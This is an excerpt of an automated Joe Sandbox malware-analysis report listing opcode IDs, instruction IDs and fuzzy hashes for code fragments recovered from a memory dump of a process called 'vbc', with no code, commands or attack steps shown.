                                                                                                                        • Instruction ID: b5bb0db1cc66ba0edd7eaeafbaddcffa0087ae832212917b402e0c861de5c4a4
                                                                                                                        • Opcode Fuzzy Hash: 853bd5b29733c82e4efb7431505f27616bde73100db9842590bffb86141ed9fa
                                                                                                                        • Instruction Fuzzy Hash: AA012171E1020DEBDB04DFA9D55599EB7F8FF48304F10406AF905E7390D678AA019BA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction ID: e0d555b45b6f058703d26bb885653a1b3eb04a934df9d8d400fbc611bf32bb77
                                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction Fuzzy Hash: 05F0FC73348E36BBC73366994844BAFA69A9FC5AA4F191435E3099B604CAA8CC0257D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f63b412d98020726835fdbc31c83c7d931607ee4fa575a44f81a6255bddaaa82
                                                                                                                        • Instruction ID: b77cd6f583e8c7dd37248930498193d68d906d190d29a8b55aa9fe7d4eec94d6
                                                                                                                        • Opcode Fuzzy Hash: f63b412d98020726835fdbc31c83c7d931607ee4fa575a44f81a6255bddaaa82
                                                                                                                        • Instruction Fuzzy Hash: DB012C71E1021DEBCB04EFA9D555AAEB7F8EF48304F10406AF905E7391D678AA018BA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c25fd89422f72ca58fafa7253a9cd7b34690424680d10721326e11779e376528
                                                                                                                        • Instruction ID: fe4ca322f060d0c3b64617c828cfaa649eb8cc9238bb23763c0deaf10d0fab02
                                                                                                                        • Opcode Fuzzy Hash: c25fd89422f72ca58fafa7253a9cd7b34690424680d10721326e11779e376528
                                                                                                                        • Instruction Fuzzy Hash: FE012C71E1020DEBDB04DFA9D445AAEBBF8EF48304F50446AF915E7390DA74AA018BA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4d66ca4d334e7a5b25cb20a0e76e17afd5b1eaa3e814c597085577e68babdf3f
                                                                                                                        • Instruction ID: 177779c63d52163c07af7c2039d4f5bc58a8a5d6016d5b00964b93302d64d735
                                                                                                                        • Opcode Fuzzy Hash: 4d66ca4d334e7a5b25cb20a0e76e17afd5b1eaa3e814c597085577e68babdf3f
                                                                                                                        • Instruction Fuzzy Hash: 74012171A1020DABDB04DFA9D9859DEBBF8FF48344F50445AF501E7380D634EA018BA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c4abefee39e4e2ba2431c996d4d50e35d970d2669f5dded1e42dceffdc48022d
                                                                                                                        • Instruction ID: bde095a0d00779663c4dad57e3a73503f7cd262fb5bde935a0bf0b4fd8563d41
                                                                                                                        • Opcode Fuzzy Hash: c4abefee39e4e2ba2431c996d4d50e35d970d2669f5dded1e42dceffdc48022d
                                                                                                                        • Instruction Fuzzy Hash: ED012C71A10259ABDB14EFA9D845AEEBBF8AF48310F14406AE501A7280DB74AA01CB95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction ID: 681617fa4fe958e569cf8b22ab3b68ab5da11be33a636d82187ca2af140ab845
                                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction Fuzzy Hash: 9CF0307220401DBFEF02AF95DD81DEF7BBDEF492E8B104125FA1196160D671DD21ABA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 913f0142016490005e2c98851678958558b14250af5dd3fdf19f5d2f2adc1920
                                                                                                                        • Instruction ID: 2ce8225b06dcba4e459b15c965c67aea1df8587fb109ac61846a36e156dc0a13
                                                                                                                        • Opcode Fuzzy Hash: 913f0142016490005e2c98851678958558b14250af5dd3fdf19f5d2f2adc1920
                                                                                                                        • Instruction Fuzzy Hash: C7019736510619ABDF129F84DC41EDE7FAAFB4C764F068102FE1966620C672DA70EF81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f601ec51a7c75384f5e97d74bce84b0b55cf433de3b71fcb1bf2927ed359cb13
                                                                                                                        • Instruction ID: 8da8109c002c57aee97388bb3f16a95408fab063eefd3d1e169a4d096652b4ee
                                                                                                                        • Opcode Fuzzy Hash: f601ec51a7c75384f5e97d74bce84b0b55cf433de3b71fcb1bf2927ed359cb13
                                                                                                                        • Instruction Fuzzy Hash: 5001A4713086849FE7369768CD4EF6537E9FB40B80F488598BA028BAD5EBE8E4418610
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ad319d4b9f057a46e805cfe6d765234f4ed60db2d099847d0b6c147b2e948e15
                                                                                                                        • Instruction ID: bccba17981a3ede87b77a803a5f86bb35a85c679237ca31b7b8abbecbfb12c52
                                                                                                                        • Opcode Fuzzy Hash: ad319d4b9f057a46e805cfe6d765234f4ed60db2d099847d0b6c147b2e948e15
                                                                                                                        • Instruction Fuzzy Hash: 04F024713047287BE314961A9C53F7632AAEBC0650F65A02AEA098B6C1E9B0FC01C3E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction ID: cbf3914abd67b43997465d8f4e70e004b4679db8f41a7568b204459c49ce5c90
                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction Fuzzy Hash: C0F08937745A5247DF75AAADA424B2AE2B6BF80950B05852CAC56CB680DFF0D82187A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Instruction ID: 714c1488fd65e9b4d6f90f9e56dbae52aa893e9bd6faca888f008e35a9eebdfe
                                                                                                                        • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                        • Instruction Fuzzy Hash: E2E0E631541B74DED7317F16DD08F62F6A6FB40711F114829A056168A0C7B4AC85DA55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f6a703c0b9cd2cd385f4cd6092548774d2fadb821792bd9e1755393849c267ae
                                                                                                                        • Instruction ID: 46de3f48fb067825c2f440b3e3ab8b8df09467ed1da9363614be87c591e1219a
                                                                                                                        • Opcode Fuzzy Hash: f6a703c0b9cd2cd385f4cd6092548774d2fadb821792bd9e1755393849c267ae
                                                                                                                        • Instruction Fuzzy Hash: DDE0C2322005606BC721FB5DDD06F8A779EEF94360F114221F15087690CB74BC40C794
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction ID: 4aa391d7ad43d2d96ffe98ade9507a1d69bb282a9519e32c3bcf04207aa71641
                                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction Fuzzy Hash: 65D0A933204620ABD732AA1CFC04FD333E9FB88720F160859B009C7050C3A0AC81CA84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction ID: a9ae671807999c757bc0dd81b4d68dddb23402b43e398b05d069a22d56416157
                                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction Fuzzy Hash: 07D0803331747097CF29A7566D14F677A5AEFC1AA4F1A006D780BD3D00C5559C83D6E0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03b6b3cc6991a517c18a1f640942e6589f0251e09e0c61e2150b129301b57449
                                                                                                                        • Instruction ID: 45e476c7a159f1e97071d2ab46e0c2052fc9472b05ecb3aa479cd4852f89246d
                                                                                                                        • Opcode Fuzzy Hash: 03b6b3cc6991a517c18a1f640942e6589f0251e09e0c61e2150b129301b57449
                                                                                                                        • Instruction Fuzzy Hash: 43D0A732110244ABC711FF08CD41F063BAAEB94740F014020B40447621CA31FC60CA48
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d828487aaf4a7912ca8799bc1a37613e36acec8dab4f4d395fa85cda969ba05
                                                                                                                        • Instruction ID: b6762334870bc36dfaf63bffaa486aaaeab07f07f8c71daeb351ed9a7f0515b6
                                                                                                                        • Opcode Fuzzy Hash: 0d828487aaf4a7912ca8799bc1a37613e36acec8dab4f4d395fa85cda969ba05
                                                                                                                        • Instruction Fuzzy Hash: 62D05E72121440DFD73ADB04C946F6577E4F700704F4580BCA0068B925C728E800DB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction ID: 8bebe5466451aa01f7d1d6be81af82b1ab2ad86e8bf415b472cb3cdbc4b2b2ba
                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction Fuzzy Hash: 7CC08C33290648AFC712EF98CD01F027BE9EB98B40F100421F3048B670C631FC60EA84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction ID: 790b066d1f294868a06b7e9a9e7ccb920ceef9d77f3f62499d2436fdc405920d
                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction Fuzzy Hash: 84D01236200248EFCB05DF91C894D9A772AFBC8710F149019FD19076108A32ED62DA50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction ID: 2843cffc5491fe1173a60f22bc98ed51206429cbd5aa008586a31347a344dbff
                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction Fuzzy Hash: 06C04879B01A418FCF19EB2AD298F6977F8FB44740F150890E805CBB21E664F841DA10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                        • Instruction ID: 2488dfba1596e2e5f77d53d156ce7cf46e67283a8a81e826620aec835a4217d8
                                                                                                                        • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                        • Instruction Fuzzy Hash: A3C02B2F0152C049CD138F3013137E0BFA0D7024C0F0C00C1D0C10F113C0144113C635
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                        • Instruction ID: 550388304a3b0213ffccacfa98cbf96d866e58c3fc3be5ea80f7c31a2597abaa
                                                                                                                        • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                        • Instruction Fuzzy Hash: 39B01236312544CFC7026720CB04F1932A9BF017D0F4900F0790089830DA189910E502
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 48cc2492478a8cee1d318bfce9c8ccca4c92c1691e33d8517ed905fe5c251d54
                                                                                                                        • Instruction ID: 43be5e2d6eb1b56fe35178f838917f663785a9533c52821e3357a0cac8b34027
                                                                                                                        • Opcode Fuzzy Hash: 48cc2492478a8cee1d318bfce9c8ccca4c92c1691e33d8517ed905fe5c251d54
                                                                                                                        • Instruction Fuzzy Hash: 33900266601600424144715C4884416A01697E13013D5C555A0594564C861C89559269
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 877907abb38009bae6ebaa9ed77ca808b878d9e6f47d8b560151ae2274a11a47
                                                                                                                        • Instruction ID: e30469ee364adef9018bd86eb7e42b27771e9fab4769b48c4599beed82ff829d
                                                                                                                        • Opcode Fuzzy Hash: 877907abb38009bae6ebaa9ed77ca808b878d9e6f47d8b560151ae2274a11a47
                                                                                                                        • Instruction Fuzzy Hash: 78900236605900129144715C48C4556801697E0301BD5C451E0464558C8A188A565361
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57db0c557729c47b572945f7ce16df4cb29bc616c2cc1c9a94d0455c72505b14
                                                                                                                        • Instruction ID: 255b9ee201a27834944fe6886b35e45450d4ff9b984034856a3e0cd167210795
                                                                                                                        • Opcode Fuzzy Hash: 57db0c557729c47b572945f7ce16df4cb29bc616c2cc1c9a94d0455c72505b14
                                                                                                                        • Instruction Fuzzy Hash: E890022630150003D144715C54986168016D7E1301FD5D451E0454558CD91989565222
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92d1c3b4b2450c78c5109fc8dd9952343f840b4a2d110ea5133148d92cf3226f
                                                                                                                        • Instruction ID: 0590494694e0ffc609b7cd8d5e20503903a6c0ba66ddd36b6d4f5cb552b76c7e
                                                                                                                        • Opcode Fuzzy Hash: 92d1c3b4b2450c78c5109fc8dd9952343f840b4a2d110ea5133148d92cf3226f
                                                                                                                        • Instruction Fuzzy Hash: CD90022E21350002D184715C548861A401687D1302FD5D855A005555CCC91989695321
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        • Opcode Fuzzy Hash: bd4f8f2c0e772c578213898bdb5815b82f8f1a11109a36a0ec42c862f6b7689d
                                                                                                                        • Instruction Fuzzy Hash: 1290026620190403D144755C4884617401687D0302FD5C451A20A4559E8A2D8D516135
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 554b6882086e498459998aed2a5b5aaa7679b0ab15cc19822d542443797229a1
                                                                                                                        • Instruction ID: 32bc0fc74c9ae8b7bf68275895e682bebf874e686745b397754749183f108a28
                                                                                                                        • Opcode Fuzzy Hash: 554b6882086e498459998aed2a5b5aaa7679b0ab15cc19822d542443797229a1
                                                                                                                        • Instruction Fuzzy Hash: 5B90023660550802D154715C4494756401687D0301FD5C451A0064658D87598B5576A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84faa7547f0b9d61a67ca3fc46157e0b8129dbb26e7969214f56e61011ec3609
                                                                                                                        • Instruction ID: 4ddf13af021f67127f5a29785968c140c9be30661878b048624056c27c7f4ee1
                                                                                                                        • Opcode Fuzzy Hash: 84faa7547f0b9d61a67ca3fc46157e0b8129dbb26e7969214f56e61011ec3609
                                                                                                                        • Instruction Fuzzy Hash: DA90023620150802D108715C4884696401687D0301FD5C451A6064659E966989917131
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3fb7ba7f9555bf53aaeedd6d6e74a7b0668f3cef68be8e31abec6e2d1766dd56
                                                                                                                        • Instruction ID: 161cfec10c84e1e1c7c8fc72265fca816250ebbc176576fd2fe43502d761a63c
                                                                                                                        • Opcode Fuzzy Hash: 3fb7ba7f9555bf53aaeedd6d6e74a7b0668f3cef68be8e31abec6e2d1766dd56
                                                                                                                        • Instruction Fuzzy Hash: F290023620150802D184715C448465A401687D1301FD5C455A0065658DCA198B5977A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67eb4405a8434125341e28c87ccb579f520fc8e82d3edc5d423ba7fdeebc5e00
                                                                                                                        • Instruction ID: 83e7515c98c1dc4cd997493c0ee664bf0a9fcc7a0fc664f3b39d33b0e8ba5d24
                                                                                                                        • Opcode Fuzzy Hash: 67eb4405a8434125341e28c87ccb579f520fc8e82d3edc5d423ba7fdeebc5e00
                                                                                                                        • Instruction Fuzzy Hash: 9090023620554842D144715C4484A56402687D0305FD5C451A00A4698D96298E55B661
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 520fb99a8a2ebc7f494442996cba72395dc2447a26414bfb84b34c0241a1a345
                                                                                                                        • Instruction ID: 0d280df713cfb363a3ea6e9b94d374b261a084e77887e00f61d384dc8d2c7e03
                                                                                                                        • Opcode Fuzzy Hash: 520fb99a8a2ebc7f494442996cba72395dc2447a26414bfb84b34c0241a1a345
                                                                                                                        • Instruction Fuzzy Hash: 9B9002A6201640924504B25C8484B1A851687E0301BD5C456E1094564CC52989519135
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f91ff371c7940098d797e211c6a3dd8f41030c1cae1b46dc4b9b350de563ae17
                                                                                                                        • Instruction ID: 694fee898a3136ce2163422cdf2f25428abc283b8f39865cb7e6de3f05b3cb4c
                                                                                                                        • Opcode Fuzzy Hash: f91ff371c7940098d797e211c6a3dd8f41030c1cae1b46dc4b9b350de563ae17
                                                                                                                        • Instruction Fuzzy Hash: ED90022A221500020149B55C068451B445697D63513D5C455F1456594CC62589655321
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cde7532831a82502e584d195c6f902fdec8b5948e338ee68dffc5b02f13bc4a2
